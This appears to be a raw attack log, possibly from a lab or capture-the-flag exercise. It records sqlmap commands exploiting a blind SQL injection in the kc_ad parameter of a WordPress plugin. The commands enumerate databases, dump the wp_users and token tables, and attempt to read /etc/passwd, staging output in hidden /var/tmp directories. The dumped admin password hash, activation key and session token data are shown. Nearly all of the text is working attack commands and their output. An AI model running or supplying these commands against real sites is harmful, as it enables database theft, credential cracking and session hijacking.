./sqlmap.py -v 3 -u 'http://172.16.0.11/wp-content/plugins/kittycatfish-2.2/base.css.php?kc_ad=16&ver=2.0' --batch --dbms=MySQL --threads=10 --random-agent --dbs --level 5 --risk 3 --technique=B -p kc_ad --output-dir=/var/tmp/.rfslf

/sqlmap.py -v 3 -u 'http://172.16.0.11/wp-content/plugins/kittycatfish-2.2/base.css.php?kc_ad=16&ver=2.0' --batch --dbms=MySQL --threads=10 --random-agent --level 5 --risk 3 --technique=B -p kc_ad -D testlabdb --tables --output-dir=/var/tmp/.rfslf

./sqlmap.py -v 3 -u 'http://172.16.0.11/wp-content/plugins/kittycatfish-2.2/base.css.php?kc_ad=16&ver=2.0' --batch --dbms=MySQL --threads=10 --random-agent --level 5 --risk 3 --technique=B -p kc_ad -D testlabdb -T tl_token --dump --output-dir=/var/tmp/.rfslf

Site_on_dark_side

./sqlmap.py -v 3 -u 'http://172.16.0.11/wp-content/plugins/kittycatfish-2.2/base.css.php?kc_ad=16&ver=2.0' --batch --dbms=MySQL --threads=10 --random-agent --level 5 --risk 3 --technique=B -p kc_ad -D testlabdb -T wp_users --dump --output-dir=/var/tmp/.rfslf

+----+----------+------------------------------------+------------+----------------+-------------+--------------+---------------+---------------------+-----------------------------------------------+
| ID | user_url | user_pass                          | user_login | user_email     | user_status | display_name | user_nicename | user_registered     | user_activation_key                           |
+----+----------+------------------------------------+------------+----------------+-------------+--------------+---------------+---------------------+-----------------------------------------------+
| 1  | <blank>  | $P$BZDm7sK8rozioz3Wjeq5Shc7qupg270 | labadmin   | admin@test.lab | 0           | labadmin     | labadmin      | 2017-06-30 12:58:59 | 1499760384:$P$BA5BsXvO1X9Rz4Q.csomIpflVo882S/ |
+----+----------+------------------------------------+------------+----------------+-------------+--------------+---------------+---------------------+-----------------------------------------------+


python /var/tmp/.lolshto/sqlmapproject-sqlmap-3f40bf1/sqlmap.py -v 3 -u http://172.16.0.11/wp-content/plugins/kittycatfish-2.2/base.css.php?kc_ad=37 --random-agent --threads 10 --dbms=mysql --level 5 --risk 3 --batch --technique B --batch -p kc_ad --string "left: 50%;" --file-read /etc/passwd --dbs --output-dir=/var/tmp/.rfslf
[*] information_schema
[*] testlabdb

python /var/tmp/.lolshto/sqlmapproject-sqlmap-3f40bf1/sqlmap.py -v 3 -u http://172.16.0.11/wp-content/plugins/kittycatfish-2.2/base.css.php?kc_ad=37 --random-agent --threads 10 --dbms=mysql --level 5 --risk 3 --batch --technique B --batch -p kc_ad --string "left: 50%;" --file-read /etc/passwd -D testlabdb --tables --output-dir=/var/tmp/.rfslf
+-----------------------+
| tl_token              |
| wp_commentmeta        |
| wp_comments           |
| wp_links              |
| wp_options            |
| wp_postmeta           |
| wp_posts              |
| wp_term_relationships |
| wp_term_taxonomy      |
| wp_termmeta           |
| wp_terms              |
| wp_usermeta           |
| wp_users              |
+-----------------------+

1,15,session_tokens,"a:1:{s:64:""fcf50dead5a8d5d504a445ea4e4eb94d998030aaaa3c2780ce3ffbf6c355a7f9"";a:4:{s:10:""expiration"";i:1499286494;s:2:""ip"";s:11:""172.16.0.18"";s:2:""ua"";s:105:""Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36"";s:5:""login"";i:1499113694;}}"
